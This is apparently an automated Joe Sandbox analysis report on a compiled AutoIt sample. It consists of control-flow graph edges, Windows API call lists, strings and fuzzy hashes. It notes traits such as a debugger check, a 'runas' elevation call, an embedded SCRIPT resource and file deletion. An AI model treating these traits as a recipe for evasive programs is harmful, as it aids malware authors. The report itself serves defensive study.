98893 6079e0 98892->98893 98894 63ef32 98892->98894 98902 608087 59 API calls Mailbox 98893->98902 98903 608189 98894->98903 98897 63ef3c 98899 620ff6 Mailbox 59 API calls 98897->98899 98898->98802 98900 63ef5c 98899->98900 98901->98816 98902->98898 98904 620ff6 Mailbox 59 API calls 98903->98904 98905 608193 98904->98905 98905->98897 98906->97480 98908 606ef5 98907->98908 98909 607009 98907->98909 98908->98909 98910 620ff6 Mailbox 59 API calls 98908->98910 98909->97488 98912 606f1c 
98910->98912 98911 620ff6 Mailbox 59 API calls 98913 606f91 98911->98913 98912->98911 98913->98909 98916 6074bd 59 API calls 98913->98916 98917 60766f 59 API calls 98913->98917 98920 6063a0 98913->98920 98946 656ac9 59 API calls Mailbox 98913->98946 98916->98913 98917->98913 98918->97491 98919->97493 98947 607b76 98920->98947 98922 6065ca 98923 60766f 59 API calls 98922->98923 98924 6065e4 Mailbox 98923->98924 98924->98913 98927 63e41f 98956 65fdba 91 API calls 4 library calls 98927->98956 98928 6068f9 98928->98924 98957 65fdba 91 API calls 4 library calls 98928->98957 98929 60766f 59 API calls 98941 6063c5 98929->98941 98933 607eec 59 API calls 98933->98941 98934 63e42d 98937 63e3bb 98938 608189 59 API calls 98937->98938 98940 63e3c6 98938->98940 98941->98922 98941->98927 98941->98928 98941->98929 98941->98933 98941->98937 98942 607faf 59 API calls 98941->98942 98945 63e3eb _memmove 98941->98945 98952 6060cc 60 API calls 98941->98952 98953 605ea1 59 API calls Mailbox 98941->98953 98954 605fd2 60 API calls 98941->98954 98955 607a84 59 API calls 2 library calls 98941->98955 98943 60659b CharUpperBuffW 98942->98943 98943->98941 98945->98927 98945->98928 98946->98913 98948 620ff6 Mailbox 59 API calls 98947->98948 98949 607b9b 98948->98949 98950 608189 59 API calls 98949->98950 98951 607baa 98950->98951 98951->98941 98952->98941 98953->98941 98954->98941 98955->98941 98956->98934 98957->98924 98958->97506 98959->97507 98961 604227 98960->98961 98962 63d638 98960->98962 98962->98961 99049->97535 99050->97535 99051->97535 99508 640226 99517 60ade2 Mailbox 99508->99517 99510 640c86 99682 6566f4 99510->99682 99512 640c8f 99514 6400e0 VariantClear 99514->99517 99515 60b6c1 99681 66a0b5 89 API calls 4 library calls 99515->99681 99517->99510 99517->99512 99517->99514 99517->99515 99524 66d2e5 99517->99524 99571 612123 99517->99571 99611 674583 99517->99611 99620 66d2e6 99517->99620 99667 67e237 99517->99667 99670 67474d 99517->99670 99679 609df0 59 API calls Mailbox 
Control-flow graph edge list (graph-viewer residue; node ids and basic-block addresses not reproduced). Windows APIs named in this graph: GetLastError, CloseHandle, ReadFile, SetFilePointerEx, GetEnvironmentVariableW, PostQuitMessage, DefWindowProcW, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject, DestroyWindow, Sleep, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, VariantClear, CharUpperBuffW, GetStdHandle, OleInitialize, CreateThread, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, GetFullPathNameW; CRT helpers: _memmove, _memset, _wcscat, __cinit, __write_nolock, __NMSG_WRITE. A separate block at 3940000-39434da calls GetPEB and Sleep.

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00603B7A
                                                    • IsDebuggerPresent.KERNEL32 ref: 00603B8C
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,006C62F8,006C62E0,?,?), ref: 00603BFD
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                      • Part of subcall function 00610A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00603C26,006C62F8,?,?,?), ref: 00610ACE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00603C81
                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006B93F0,00000010), ref: 0063D4BC
                                                    • SetCurrentDirectoryW.KERNEL32(?,006C62F8,?,?,?), ref: 0063D4F4
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,006B5D40,006C62F8,?,?,?), ref: 0063D57A
                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0063D581
                                                      • Part of subcall function 00603A58: GetSysColorBrush.USER32(0000000F), ref: 00603A62
                                                      • Part of subcall function 00603A58: LoadCursorW.USER32(00000000,00007F00), ref: 00603A71
                                                      • Part of subcall function 00603A58: LoadIconW.USER32(00000063), ref: 00603A88
                                                      • Part of subcall function 00603A58: LoadIconW.USER32(000000A4), ref: 00603A9A
                                                      • Part of subcall function 00603A58: LoadIconW.USER32(000000A2), ref: 00603AAC
                                                      • Part of subcall function 00603A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00603AD2
                                                      • Part of subcall function 00603A58: RegisterClassExW.USER32(?), ref: 00603B28
                                                      • Part of subcall function 006039E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00603A15
                                                      • Part of subcall function 006039E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603A36
                                                      • Part of subcall function 006039E7: ShowWindow.USER32(00000000,?,?), ref: 00603A4A
                                                      • Part of subcall function 006039E7: ShowWindow.USER32(00000000,?,?), ref: 00603A53
                                                      • Part of subcall function 006043DB: _memset.LIBCMT ref: 00604401
                                                      • Part of subcall function 006043DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006044A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%i
                                                    • API String ID: 529118366-2620332297
                                                    • Opcode ID: 492229bb73fa6d6b815572fb4be6063cb0783793f3e30d26a0e8bad2f3d62d1d
                                                    • Instruction ID: 096015140cf1f0ec6c3d83b83a05e28f9890d8804972343eb51f9633098aa740
                                                    • Opcode Fuzzy Hash: 492229bb73fa6d6b815572fb4be6063cb0783793f3e30d26a0e8bad2f3d62d1d
                                                    • Instruction Fuzzy Hash: B551D370D44248AADB19ABB4EC05EFF7B7BEF04304F00516DF411A22E2DA785746CB69

                                                    Control-flow Graph

                                                    control_flow_graph 983 604fe9-605001 CreateStreamOnHGlobal 984 605021-605026 983->984 985 605003-60501a FindResourceExW 983->985 986 605020 985->986 987 63dd5c-63dd6b LoadResource 985->987 986->984 987->986 988 63dd71-63dd7f SizeofResource 987->988 988->986 989 63dd85-63dd90 LockResource 988->989 989->986 990 63dd96-63ddb4 989->990 990->986
                                                    APIs
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00604EEE,?,?,00000000,00000000), ref: 00604FF9
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00604EEE,?,?,00000000,00000000), ref: 00605010
                                                    • LoadResource.KERNEL32(?,00000000,?,?,00604EEE,?,?,00000000,00000000,?,?,?,?,?,?,00604F8F), ref: 0063DD60
                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00604EEE,?,?,00000000,00000000,?,?,?,?,?,?,00604F8F), ref: 0063DD75
                                                    • LockResource.KERNEL32(N`,?,?,00604EEE,?,?,00000000,00000000,?,?,?,?,?,?,00604F8F,00000000), ref: 0063DD88
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT$N`
                                                    • API String ID: 3051347437-2945502020
                                                    • Opcode ID: 9be3bddbdbdbb9115286a89e92fec974f98a6de06c96c69954ab70e4cae321c3
                                                    • Instruction ID: d7c07da10f4bba2a285d4fec78491a35e184637dedc7f0f9e96d35050a701275
                                                    • Opcode Fuzzy Hash: 9be3bddbdbdbb9115286a89e92fec974f98a6de06c96c69954ab70e4cae321c3
                                                    • Instruction Fuzzy Hash: CD112A75240701BFD7258B65DC58F6B7BBAEBC9B51F204268F406D62A0DB61EC008BA0

                                                    Control-flow Graph

                                                    control_flow_graph 1047 604afe-604b5e call 6077c7 GetVersionExW call 607d2c 1052 604b64 1047->1052 1053 604c69-604c6b 1047->1053 1055 604b67-604b6c 1052->1055 1054 63db90-63db9c 1053->1054 1056 63db9d-63dba1 1054->1056 1057 604c70-604c71 1055->1057 1058 604b72 1055->1058 1060 63dba3 1056->1060 1061 63dba4-63dbb0 1056->1061 1059 604b73-604baa call 607e8c call 607886 1057->1059 1058->1059 1069 604bb0-604bb1 1059->1069 1070 63dc8d-63dc90 1059->1070 1060->1061 1061->1056 1063 63dbb2-63dbb7 1061->1063 1063->1055 1065 63dbbd-63dbc4 1063->1065 1065->1054 1067 63dbc6 1065->1067 1071 63dbcb-63dbce 1067->1071 1069->1071 1072 604bb7-604bc2 1069->1072 1073 63dc92 1070->1073 1074 63dca9-63dcad 1070->1074 1075 604bf1-604c08 GetCurrentProcess IsWow64Process 1071->1075 1076 63dbd4-63dbf2 1071->1076 1077 63dc13-63dc19 1072->1077 1078 604bc8-604bca 1072->1078 1079 63dc95 1073->1079 1081 63dc98-63dca1 1074->1081 1082 63dcaf-63dcb8 1074->1082 1083 604c0a 1075->1083 1084 604c0d-604c1e 1075->1084 1076->1075 1080 63dbf8-63dbfe 1076->1080 1089 63dc23-63dc29 1077->1089 1090 63dc1b-63dc1e 1077->1090 1085 604bd0-604bd3 1078->1085 1086 63dc2e-63dc3a 1078->1086 1087 63dc00-63dc03 1080->1087 1088 63dc08-63dc0e 1080->1088 1081->1074 1082->1079 1091 63dcba-63dcbd 1082->1091 1083->1084 1092 604c20-604c30 call 604c95 1084->1092 1093 604c89-604c93 GetSystemInfo 1084->1093 1094 63dc5a-63dc5d 1085->1094 1095 604bd9-604be8 1085->1095 1097 63dc44-63dc4a 1086->1097 1098 63dc3c-63dc3f 1086->1098 1087->1075 1088->1075 1089->1075 1090->1075 1091->1081 1104 604c32-604c3f call 604c95 1092->1104 1105 604c7d-604c87 GetSystemInfo 1092->1105 1096 604c56-604c66 1093->1096 1094->1075 1103 63dc63-63dc78 1094->1103 1100 63dc4f-63dc55 1095->1100 1101 604bee 1095->1101 1097->1075 1098->1075 1100->1075 1101->1075 1106 63dc82-63dc88 1103->1106 1107 63dc7a-63dc7d 1103->1107 1112 604c41-604c45 GetNativeSystemInfo 1104->1112 1113 604c76-604c7b 1104->1113 1108 604c47-604c4b 1105->1108 1106->1075 1107->1075 1108->1096 1111 604c4d-604c50 FreeLibrary 1108->1111 1111->1096 1112->1108 1113->1112
APIs
• GetVersionExW.KERNEL32(?), ref: 00604B2B
  • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
• GetCurrentProcess.KERNEL32(?,0068FAEC,00000000,00000000,?), ref: 00604BF8
• IsWow64Process.KERNEL32(00000000), ref: 00604BFF
• GetNativeSystemInfo.KERNELBASE(00000000), ref: 00604C45
• FreeLibrary.KERNEL32(00000000), ref: 00604C50
• GetSystemInfo.KERNEL32(00000000), ref: 00604C81
• GetSystemInfo.KERNEL32(00000000), ref: 00604C8D
Memory Dump Source
• Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
Similarity
• API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
• String ID:
• API String ID: 1986165174-0
• Opcode ID: 7a0fbbff4a4ab7059661c81c9f2994d7237ea277541b41a98175892af16ff24f
• Instruction ID: 65b481231385d29aee7897f36039a3942f3492f0f778859ebc8a468c91bdc634
• Opcode Fuzzy Hash: 7a0fbbff4a4ab7059661c81c9f2994d7237ea277541b41a98175892af16ff24f
• Instruction Fuzzy Hash: F591C47198A7C0DEC735CB6894511ABFFE6AF25300F444A9DD1CB93B81D630E948C769
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
Similarity
• API ID:
• String ID: Dtl$Dtl$Dtl$Dtl$Variable must be of type 'Object'.
• API String ID: 0-2238547659
• Opcode ID: 751c7579fe9863d73caaa8b29936710264bfa40192cab8076b987cd52610056e
• Instruction ID: 479830568cc98367195d1de04773ba15034edcd70efc9c7c879d41edcf114fc3
• Opcode Fuzzy Hash: 751c7579fe9863d73caaa8b29936710264bfa40192cab8076b987cd52610056e
• Instruction Fuzzy Hash: 69A29174A44225CFCB28CF58C581AAEB7B3FF58300F248459E916AB391D776ED42CB91
APIs
• GetFileAttributesW.KERNELBASE(?,0063E7C1), ref: 006646A6
• FindFirstFileW.KERNELBASE(?,?), ref: 006646B7
• FindClose.KERNEL32(00000000), ref: 006646C7
Memory Dump Source
• Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 69d69a708167fb110e97fee61f94643e72869407344cbaad405414610d475f55
• Instruction ID: 9db032aa4ed19c1fe944a5afa9c278b84ba96d5c957e7211e8f748d83b8a02bb
• Opcode Fuzzy Hash: 69d69a708167fb110e97fee61f94643e72869407344cbaad405414610d475f55
• Instruction Fuzzy Hash: 09E0DF328104006B8710A778EC5D8EA7B9E9E46335F200726F835C25E0EBB09E6086DA
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00610BBB
• timeGetTime.WINMM ref: 00610E76
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00610FB3
• TranslateMessage.USER32(?), ref: 00610FC7
• DispatchMessageW.USER32(?), ref: 00610FD5
• Sleep.KERNEL32(0000000A), ref: 00610FDF
• LockWindowUpdate.USER32(00000000,?,?), ref: 0061105A
• DestroyWindow.USER32 ref: 00611066
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00611080
• Sleep.KERNEL32(0000000A,?,?), ref: 006452AD
• TranslateMessage.USER32(?), ref: 0064608A
• DispatchMessageW.USER32(?), ref: 00646098
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006460AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
Similarity
• API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
• String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prl$prl$prl$prl
• API String ID: 4003667617-2208558280
• Opcode ID: 7f19f3f2d80f0fe249a711bb1cb4920afb721e26454ea5cfd0f6f1e87d401c1d
• Instruction ID: 81a4fe2734505bb6fbf31d6de3bebb7c4dc5dfb60a38c57fea246d8f1ce36a7f
• Opcode Fuzzy Hash: 7f19f3f2d80f0fe249a711bb1cb4920afb721e26454ea5cfd0f6f1e87d401c1d
• Instruction Fuzzy Hash: 16B2A470608741DFDB68DF24C884BAAB7E7BF85304F18491DF44A872A2DB71E885CB56

Control-flow Graph

APIs
  • Part of subcall function 006691E9: __time64.LIBCMT ref: 006691F3
  • Part of subcall function 00605045: _fseek.LIBCMT ref: 0060505D
• __wsplitpath.LIBCMT ref: 006694BE
  • Part of subcall function 0062432E: __wsplitpath_helper.LIBCMT ref: 0062436E
• _wcscpy.LIBCMT ref: 006694D1
• _wcscat.LIBCMT ref: 006694E4
• __wsplitpath.LIBCMT ref: 00669509
• _wcscat.LIBCMT ref: 0066951F
• _wcscat.LIBCMT ref: 00669532
  • Part of subcall function 0066922F: _memmove.LIBCMT ref: 00669268
  • Part of subcall function 0066922F: _memmove.LIBCMT ref: 00669277
• _wcscmp.LIBCMT ref: 00669479
  • Part of subcall function 006699BE: _wcscmp.LIBCMT ref: 00669AAE
  • Part of subcall function 006699BE: _wcscmp.LIBCMT ref: 00669AC1
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006696DC
• _wcsncpy.LIBCMT ref: 0066974F
• DeleteFileW.KERNEL32(?,?), ref: 00669785
• CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0066979B
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006697AC
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006697BE
Memory Dump Source
• Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0
• Opcode ID: 675a66a6b14c2e482cd181d8f863669d145d3daf530259f402bf6f874a579bcf
• Instruction ID: 57c1a33237e4998edb24a5c8b87eb856523316a25706a599479672cb3e8d064e
• Opcode Fuzzy Hash: 675a66a6b14c2e482cd181d8f863669d145d3daf530259f402bf6f874a579bcf
• Instruction Fuzzy Hash: 80C13EB1D00229AADF65DF95CC85ADFB7BEEF45300F0040AAF609E7151DB309A858F65

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00603074
• RegisterClassExW.USER32(00000030), ref: 0060309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
• InitCommonControlsEx.COMCTL32(?), ref: 006030CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
• LoadIconW.USER32(000000A9), ref: 006030F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: de62fb3100d012f121fc7972fc712104afc0f8b12f8a9bc188d942165b8f4352
• Instruction ID: de9d34a91cd6af462e7712e0947f3f9ec0e46ec1b328a5b327bc241f83e2c713
• Opcode Fuzzy Hash: de62fb3100d012f121fc7972fc712104afc0f8b12f8a9bc188d942165b8f4352
• Instruction Fuzzy Hash: 353149B1841349AFEB008FA4EC88AD9BBF2FF09310F14566AF551EA2A1D3B64541CF64

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00603074
• RegisterClassExW.USER32(00000030), ref: 0060309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
• InitCommonControlsEx.COMCTL32(?), ref: 006030CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
• LoadIconW.USER32(000000A9), ref: 006030F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: d38f35452ef16f3b72429268b9f9eb14e6f3ba84b11ada819bd755565aab73cd
• Instruction ID: 79da3579c5842c31ec2686ea49e1f97a22c1296b1e732415914909e69068dcfb
• Opcode Fuzzy Hash: d38f35452ef16f3b72429268b9f9eb14e6f3ba84b11ada819bd755565aab73cd
• Instruction Fuzzy Hash: E021C7B1951218EFEB00DFA4EC49B9DBBF6FB08710F10522AF511A62A0D7B545448FA5

Control-flow Graph

APIs
  • Part of subcall function 00604864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006C62F8,?,006037C0,?), ref: 00604882
  • Part of subcall function 0062074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006072C5), ref: 00620771
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00607308
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0063ECF1
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0063ED32
• RegCloseKey.ADVAPI32(?), ref: 0063ED70
• _wcscat.LIBCMT ref: 0063EDC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: c43b447d01451611c08c1d80dc78be057e49e280c8d2b820b474b41c019fff61
• Instruction ID: bb8615330ef18219441863b33b013aa717aed1d79261efa68bfc34b3900cfccc
• Opcode Fuzzy Hash: c43b447d01451611c08c1d80dc78be057e49e280c8d2b820b474b41c019fff61
• Instruction Fuzzy Hash: D7718E714483019EC718EF25EC81DABBBEAFF58350F40552EF455872A0EB319A48CFA6

Control-flow Graph

APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 006036D2
• KillTimer.USER32(?,00000001), ref: 006036FC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0060371F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0060372A
• CreatePopupMenu.USER32 ref: 0060373E
• PostQuitMessage.USER32(00000000), ref: 0060375F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated$%i
• API String ID: 129472671-2085807306
• Opcode ID: e648a4240b1b6bc026b692b9b3e453b30a62b0487c1b90e952f2ad208eab3a87
• Instruction ID: a1314d980cc92298804914f713a0dd9bc960dbee0cb0d64bc001bc1b9ff5432a
• Opcode Fuzzy Hash: e648a4240b1b6bc026b692b9b3e453b30a62b0487c1b90e952f2ad208eab3a87
• Instruction Fuzzy Hash: 204138B2190115BBEF2C5F68EC09FBB375FE704302F14062DF602863E1CAA69E419369

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00603A62
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00603A71
                                                    • LoadIconW.USER32(00000063), ref: 00603A88
                                                    • LoadIconW.USER32(000000A4), ref: 00603A9A
